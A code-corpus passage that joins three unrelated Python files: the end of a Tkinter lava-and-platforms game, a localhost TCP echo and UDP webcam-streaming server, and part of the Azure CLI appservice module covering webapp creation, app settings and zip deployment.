elif dt < 0.3 and last.type != "death":
x = "death"
else:
x = "normal"
pl = Platform(self.game, x3, ny+100, 100, 15, last=True, num=self.game.platform_number, type=x, text="## LEVEL COMPLETED ##")
self.game.platform_number += 1
self.game.platforms.append(pl)
platform.touched = True
if platform.type == "coin" and not platform.on_coin:
self.game.play_sound("{0}/coin.mp3".format(self.game.soundspath))
self.game.shop.job_button.jobs[2]["Get coins"]["progress"] += 1
if self.game.shop.job_button.jobs[2]["Get coins"]["progress"] == self.game.shop.job_button.jobs[2]["Get coins"]["number"]:
self.game.shop.job_button.jobs[2]["Get coins"]["number"] += 5
self.game.shop.job_button.jobs[2]["Get coins"]["reward"] += 3
self.game.shop.job_button.jobs[2]["Get coins"]["level"] += 1
self.game.diamonds += self.game.shop.job_button.jobs[2]["Get coins"]["reward"] - 4
self.game.shop.job_button.jobs[2]["Get coins"]["progress"] = 0
self.game.play_sound("{0}/level.mp3".format(self.game.soundspath))
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["jobs"] == 1:
messagebox.showinfo("Info", "You passed next job level in \"Get Coins\" reward is {0} diamonds".format(self.game.shop.job_button.jobs[2]["Get coins"]["reward"]-4)) #HERE
self.game.coins += 1
platform.on_coin = True
platform.reset_type()
self.y = 0
break
else:
self.game.canvas.move(platform.id, 0, -10)
self.lava.fall = False
x += 1
self.damage += 1
pos = self.game.canvas.coords(self.id)
# if pos[3] >= 500:
# self.game.gameIsRunning = False
lava_pos = self.game.canvas.coords(self.lava.id)
self.game.lava_dist = pos[1]-lava_pos[3]
if self.game.lava_dist <= 0:
self.game.gameover(errortype="Lava touched you!")
# print(len(self.game.platforms))
#print(self.game.lava_dist)
class Platform:
def __init__(self, game, x, y, w, h, last=False, next=True, type="normal", num=0, text=None):
self.game = game
self.id_number = num
self.last = last
if not text is None:
self.center_text = ""
if not text == "## LEVEL COMPLETED ##":
self.center_text = text
elif text == "## LEVEL COMPLETED ##" and self.id_number % 10 == 0:
self.center_text = "LEVEL {0} END".format(self.id_number // 10)
else:
self.center_text = ""#self.id_number
self.next = next
self.type = type
self.on_coin = False
self.touched = False
self.x_d, self.y_d, self.w_d, self.h_d = x, y, w, h
self.transform(self.type)
self.add_level_line()
self.set_platform_text()
def set_platform_text(self):
centerx, centery = self.x_d+self.w_d/2, self.y_d+self.h_d/2
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
def add_level_line(self):
x, y, x1, y1 = self.game.canvas.coords(self.id)
ly = y+((y1-y)/2)
if self.id_number % 10 == 0:
self.id_line = self.game.canvas.create_line(0, ly, x, ly, tags=self.id, dash=(4,2))
self.id_line2 = self.game.canvas.create_line(x1, ly, 500, ly, tags=self.id, dash=(4,2))
def transform(self, type):
x, y, w, h = self.x_d, self.y_d, self.w_d, self.h_d
centerx, centery = x+w/2, y+h/2
if type == "normal":
self.id_x = self.game.canvas.create_rectangle(x, y, x+w, y+h, tags="normal_platform{0}".format(self.id_number), fill="red")
self.id = "normal_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
elif type == "coin":
self.id_x = self.game.canvas.create_rectangle(x, y, x+w, y+h, fill="red", tags="coin_platform{0}".format(self.id_number))
self.coin_id = self.game.canvas.create_oval(x+(w/2)-10, y-30, x+(w/2)-10+20, y-30+20, tags="coin_platform{0}".format(self.id_number), fill="yellow")
self.id = "coin_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
elif type == "death":
self.id_x = self.game.canvas.create_rectangle(x, y, x+w, y+h, fill="gray80", tags="death_platform{0}".format(self.id_number))
self.id = "death_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
def reset_type(self):
x, y, x1, y1 = self.game.canvas.coords(self.id_x)
centerx, centery = x+(x1-x)/2, y+(y1-y)/2
self.game.canvas.delete(self.id)
self.id_x = self.game.canvas.create_rectangle(x, y, x1, y1, fill="red", tags="normal_platform{0}".format(self.id_number))
self.id = "normal_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
class Lava:
def __init__(self, game):
self.game = game
self.id = self.game.canvas.create_rectangle(0, 0, 500, 500, fill="orange")
self.game.canvas.move(self.id, 0, -850)
self.fall = True
def draw(self):
if self.fall:
self.game.canvas.move(self.id, 0, 2)
else:
self.game.canvas.move(self.id, 0, -7)
pos = self.game.canvas.coords(self.id)
if pos[3] >= 500:
self.game.gameover()
pass
def main(ktc=1, st=False):
global g, l, p, pl, pl2, pl3
g = Game(st=st, ktc=ktc)
g.setup_directory()
l = Lava(g)
p = Player(g, l)
pl = Platform(g, 20, 150, 100, 15, num=g.platform_number, text="START")
pl.touched = True
g.platform_number += 1
pl2 = Platform(g, 140, 250, 100, 15, type="coin", num=g.platform_number)
g.platform_number += 1
pl3 = Platform(g, 280, 350, 100, 15, last=True, num=g.platform_number)
g.platform_number += 1
g.platforms.append(pl)
g.platforms.append(pl2)
g.platforms.append(pl3)
g.at_start()
g.player_shop = p
g.mainloop()
if __name__ == '__main__':
main()
|
server_combined.py
|
#!/usr/bin/env python3
import cv2, imutils, socket, base64
from threading import Thread
tcp_server_address = ("127.0.0.1", 10001)
udp_server_address = ("127.0.0.1", 10002)
tcp_buff_size = 1024
udp_buff_size = 65536 # max buffer size
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
udp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, udp_buff_size)
def tx_tcp():
print(f"Binding TCP server to {tcp_server_address}")
tcp_server_socket.bind(tcp_server_address)
tcp_server_socket.listen(1)
client_socket, client_address = tcp_server_socket.accept()
while True:
data = client_socket.recv(tcp_buff_size)
if len(data) > 0:
print(f"Received {data} from {client_address}")
client_socket.sendall(data)
print(f"Sent {data} back to {client_address}")
def tx_udp():
print(f"Binding UDP server to {udp_server_address}")
udp_server_socket.bind(udp_server_address)
vid = cv2.VideoCapture(0)
while True:
init_msg, client_address = udp_server_socket.recvfrom(udp_buff_size) # receive init message
print(f"Received init msg from {client_address}, starting video transmission...")
WIDTH=400
while vid.isOpened():
_, frame = vid.read()
frame = imutils.resize(frame, width=WIDTH) # if you want to reduce frame size
_, buffer = cv2.imencode('.jpg', frame, [cv2.IMWRITE_JPEG_QUALITY, 80]) # compress image
msg = base64.b64encode(buffer)
# print(f"Encoding: frame({frame.shape[0]*frame.shape[1]*frame.shape[2]}) -> encoded({len(buffer)}) -> base64({len(msg)})")
udp_server_socket.sendto(msg, client_address)
cv2.imshow("TRANSMITTING VIDEO", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
udp_server_socket.close()
break
# ----------------------- main loop -------------------------
tcp_thread = Thread(target=tx_tcp)
udp_thread = Thread(target=tx_udp)
tcp_thread.start()
udp_thread.start()
tcp_thread.join()
udp_thread.join()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
AzureInternalError, ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_name,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location):
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check the status of async deployment
if res.status_code == 202:
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
# check if there's an ongoing process
if res.status_code == 409:
raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
"WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
"WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
"appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
"MySubscription' to list app settings and 'az webapp config appsettings delete "
"--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
"to delete them.".format(deployment_status_url))
# check if an error occured during deployment
if res.status_code:
raise AzureInternalError("An error occured during deployment. Status Code: {}, Details: {}"
.format(res.status_code, res.text))
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
